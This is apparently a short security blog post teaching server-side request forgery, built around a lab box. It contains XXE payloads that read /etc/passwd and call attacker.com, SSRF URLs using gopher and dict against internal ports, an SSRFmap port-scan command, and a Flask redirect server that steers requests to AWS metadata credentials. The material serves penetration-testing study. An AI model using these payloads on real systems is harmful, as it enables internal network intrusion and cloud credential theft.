SSRF:

n00🔑
3 min readApr 10, 2024

--

SSRF- Server Side Request Forgery is a technique used to subvert the application logic from the intended functionality of fetching contents from other sources to loading attacker-supplied targets. RFI and SSRF are very similar only difference is in RFI there is code execution but in SSRF code execution may not be there. Implications of SSRF are endless from scanningthe internal network to RCE and chaining with other issues can have a huge impact e.g XXE can be escalated to SSRF by using http:// in place of file:// in the payload below.

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<foo>&xxe;</foo>
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "http://www.attacker.com/text.txt" >]>
<foo>&xxe;</foo>

Detecting SSRF-

a) Using burp collaborator or project discovery’s interactsh-

Note: In this case server do not has access to internet, so we will be using interactsh. In real scenario I usually use collaborator.

If we get only dns interaction in any of these tools. There is a possibility that http is blocked. in that case we can try using other protocols like gopher.

Other online collaborator like services-

http://pingb.in/

https://swin.es/o/kOxHa

https://requestbin.net/

https://beeceptor.com/

b) Try accessing a known service-

In this case I already know ssh is running on port 22.

http://10.10.10.55:60000/url.php?path=http://10.10.10.55:22

If HTTP is blocked try accessing via other protocols.

http://10.10.10.55:60000/url.php?path=dict://10.10.10.55:22
http://10.10.10.55:60000/url.php?path=gopher://10.10.10.55:22

Other protocols-

sftp://attacker.com:port/
dict://attacker:port/
tftp://attacker.com:port/
ldap://localhost:port/
gopher://127.0.0.1:port/

Some of the things we can do with SSRF-

  1. Port scanning-

We can use ssrf to scan internal ips for open tcp ports. Lets scan ports for localhost lo interface.

I prefer to use SSRFmap. It has a module for portscannig. Let’s see this in action:

By default it has list of only top 8000 ports. We can edit the ports list to add all 65535 ports-

seq 1 65535 > ./data/ports

Also we need to copy the SSRF http request to a file. We can simply copy the request and save it to a file or use burpsuite’s Copy to file option.

Let’s start portscan-

python3 ssrfmap.py -r data/req.txt -p path -m portscan | tee portscan.out | grep open
  • -r for specifying the request file.
  • -p vulnerable paramter name
  • -m module to use

Now we found more services than scanning from external network-

We can also do our scan via burp intruder and sort the responses in descending order according to length.

SSRF bypass for accessing AWS metadata when DNS resolution check is in place-

from flask import Flask, redirect

app = Flask(__name__)

@app.route('/')
def home():
return redirect("http://169.254.169.254/latest/meta-data/identity-credentials/ec2/security-credentials/ec2-instance", code=302)

if __name__ == '__main__':
app.run(host='0.0.0.0', port=8080)

--

--

n00🔑
n00🔑

Written by n00🔑

Computer Security Enthusiast. Usually plays HTB (ID-23862). https://www.youtube.com/@pswalia2u https://www.linkedin.com/in/pswalia2u/ Instagram @pswalia4u

Responses (1)